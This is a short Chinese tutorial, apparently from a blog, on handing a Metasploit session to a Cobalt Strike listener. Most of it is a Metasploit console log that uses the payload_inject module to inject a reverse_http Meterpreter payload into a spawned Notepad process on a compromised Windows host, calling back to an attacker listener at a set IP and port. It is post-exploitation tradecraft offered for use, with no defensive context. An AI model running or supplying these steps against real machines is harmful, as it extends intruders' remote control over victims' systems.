1、cobaltstrike创建监听器

metasploit派生一个shell给cobaltstrike

 

 2、metasploit派生shell

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(windows/local/payload_inject) > set lhost 192.168.0.254

lhost => 192.168.0.254

msf5 exploit(windows/local/payload_inject) > set session 1

session => 1

msf5 exploit(windows/local/payload_inject) > set lport 4454

lport => 4454

msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true

disablepayloadhandler => true

msf5 exploit(windows/local/payload_inject) > exploit

[*] Running module against WIN-KNM1L8FAL1D
[*] Spawned Notepad process 2152
[*] Injecting payload into 2152
[*] Preparing 'windows/meterpreter/reverse_http' for PID 2152

相关文章:

  • 2022-12-23
  • 2021-07-30
  • 2021-11-19
  • 2021-08-12
  • 2022-12-23
  • 2021-12-11
  • 2022-03-04
  • 2023-02-26
猜你喜欢
  • 2022-02-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-08-05
  • 2022-12-23
相关资源
相似解决方案